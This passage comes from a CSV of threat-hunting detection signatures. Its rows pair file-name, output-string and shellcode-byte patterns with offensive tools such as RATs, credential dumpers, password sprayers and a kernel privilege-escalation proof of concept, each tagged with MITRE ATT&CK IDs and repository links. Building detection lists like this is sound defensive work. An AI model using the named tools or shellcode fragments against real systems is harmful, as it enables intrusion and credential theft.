Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*\x64\Stardust.asm*",".{0,1000}\\x64\\Stardust\.asm.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*\x83\x64\x24\x30\x00\x48\x8d\x45\xe0\x44\x8b\x4d\xd8\x48\x8d\x15*",".{0,1000}\\x83\\x64\\x24\\x30\\x00\\x48\\x8d\\x45\\xe0\\x44\\x8b\\x4d\\xd8\\x48\\x8d\\x15.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*\x8b\x31\x39\x72\x10\x75*",".{0,1000}\\x8b\\x31\\x39\\x72\\x10\\x75.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*\Xclipboard.ps1*",".{0,1000}\\Xclipboard\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - 
T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\xeno rat server.*",".{0,1000}\\xeno\srat\sserver\..{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\xeno rat server\*",".{0,1000}\\xeno\srat\sserver\\.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\xeno-rat\*",".{0,1000}\\xeno\-rat\\.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\xeno-rat-main*",".{0,1000}\\xeno\-rat\-main.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48*",".{0,1000}\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc8\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. 
Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*\XHVNC.exe*",".{0,1000}\\XHVNC\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\XKlog.txt*",".{0,1000}\\XKlog\.txt.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - 
TA0009","N/A","N/A","malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","10","1","21","10","2023-10-03T01:34:12Z","2023-10-03T01:27:37Z" "*\xmrig.exe*",".{0,1000}\\xmrig\.exe.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*\XOR_b64_encrypted\*",".{0,1000}\\XOR_b64_encrypted\\.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*\xorencrypt.py*",".{0,1000}\\xorencrypt\.py.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*\XRulez.cpp*",".{0,1000}\\XRulez\.cpp.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" 
"*\XRulez.exe*",".{0,1000}\\XRulez\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*\XRulez.sln*",".{0,1000}\\XRulez\.sln.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*\XRulez.zip*",".{0,1000}\\XRulez\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*\XRulez\Injector\*",".{0,1000}\\XRulez\\Injector\\.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*\XWorm RAT V*",".{0,1000}\\XWorm\sRAT\sV.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - 
TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\XWorm.config*",".{0,1000}\\XWorm\.config.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","10","1","21","10","2023-10-03T01:34:12Z","2023-10-03T01:27:37Z" "*\XWorm.exe*",".{0,1000}\\XWorm\.exe.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","10","1","21","10","2023-10-03T01:34:12Z","2023-10-03T01:27:37Z" "*\XWorm.exe*",".{0,1000}\\XWorm\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\XWorm.rar*",".{0,1000}\\XWorm\.rar.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","10","1","21","10","2023-10-03T01:34:12Z","2023-10-03T01:27:37Z" "*\XWorm.zip*",".{0,1000}\\XWorm\.zip.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 
- T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\XWorm-RAT-*",".{0,1000}\\XWorm\-RAT\-.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\ysoserial\*",".{0,1000}\\ysoserial\\.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*\zerologon.py*",".{0,1000}\\zerologon\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\ZipExec -*",".{0,1000}\\ZipExec\s\-.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" 
"*\ZipExec.exe*",".{0,1000}\\ZipExec\.exe.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*\ZipExec.go*",".{0,1000}\\ZipExec\.go.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*] - caution! this means that exploit is not fileless*",".{0,1000}\]\s\-\scaution!\sthis\smeans\sthat\sexploit\sis\snot\sfileless.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*] Any passwords that were successfully sprayed have been output to *",".{0,1000}\]\sAny\spasswords\sthat\swere\ssuccessfully\ssprayed\shave\sbeen\soutput\sto\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*] Attempting to enumerate logged on users on *",".{0,1000}\]\sAttempting\sto\senumerate\slogged\son\susers\son\s.{0,1000}","offensive_tool_keyword","GetLoggedOnUsersRegistry","PoC To enumerate logged on users on a remote system using 
the winreg named pipe","T1087 - T1018 - T1057","TA0007 - TA0003 - TA0004","N/A","N/A","Lateral Movement - Discovery","https://gist.github.com/RalphDesmangles/22f580655f479f189c1de9e7720776f1","1","0","N/A","8","8","N/A","N/A","N/A","N/A" "*] Bruteforcing %d CLSIDs*",".{0,1000}\]\sBruteforcing\s\%d\sCLSIDs.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*] Check for ADCS Vulnerabilities*",".{0,1000}\]\sCheck\sfor\sADCS\sVulnerabilities.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*] Cleared all rat command queues!*",".{0,1000}\]\sCleared\sall\srat\scommand\squeues!.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*] Cloning GPO * from fakedc ",".{0,1000}\]\sCloning\sGPO\s.{0,1000}\sfrom\sfakedc\s","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*] compile geacon with the public key from 
.beacon_keys*",".{0,1000}\]\scompile\sgeacon\swith\sthe\spublic\skey\sfrom\s\.beacon_keys.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*] Completed Privesc Checks in *",".{0,1000}\]\sCompleted\sPrivesc\sChecks\sin\s.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*] DHCP sniffer identified potential spoofing target:*",".{0,1000}\]\sDHCP\ssniffer\sidentified\spotential\sspoofing\starget\:.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*] DHCP Sniffer identified previously sniffed name: *",".{0,1000}\]\sDHCP\sSniffer\sidentified\spreviously\ssniffed\sname\:\s.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*] Dumping browsers credentials ..*",".{0,1000}\]\sDumping\sbrowsers\scredentials\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script 
content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*] Dumping mail serv credentials ..*",".{0,1000}\]\sDumping\smail\sserv\scredentials\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*] Dumping messenger credentials ..*",".{0,1000}\]\sDumping\smessenger\scredentials\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*] dumping runtime core memory of the root smart contract*",".{0,1000}\]\sdumping\sruntime\score\smemory\sof\sthe\sroot\ssmart\scontract.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*] Enable Persistence (Y/n): *",".{0,1000}\]\sEnable\sPersistence\s\(Y\/n\)\:\s.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*] Enjoy your creds! Reverting to self*",".{0,1000}\]\sEnjoy\syour\screds!\sReverting\sto\sself.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*] Eventviewer Persistence created*",".{0,1000}\]\sEventviewer\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*] executing xss local file write to hijack systemd user*",".{0,1000}\]\sexecuting\sxss\slocal\sfile\swrite\sto\shijack\ssystemd\suser.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*] Extension Hijacking Persistence 
created*",".{0,1000}\]\sExtension\sHijacking\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*] Fetching LLVM-Obfuscator ?*",".{0,1000}\]\sFetching\sLLVM\-Obfuscator\s\?.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*] Found kerberoastable users: *",".{0,1000}\]\sFound\skerberoastable\susers\:\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*] Found non-ASCII service: *",".{0,1000}\]\sFound\snon\-ASCII\sservice\:\s.{0,1000}","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*] going to escalate the quantum privilege of wifi driver*",".{0,1000}\]\sgoing\sto\sescalate\sthe\squantum\sprivilege\sof\swifi\sdriver.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 
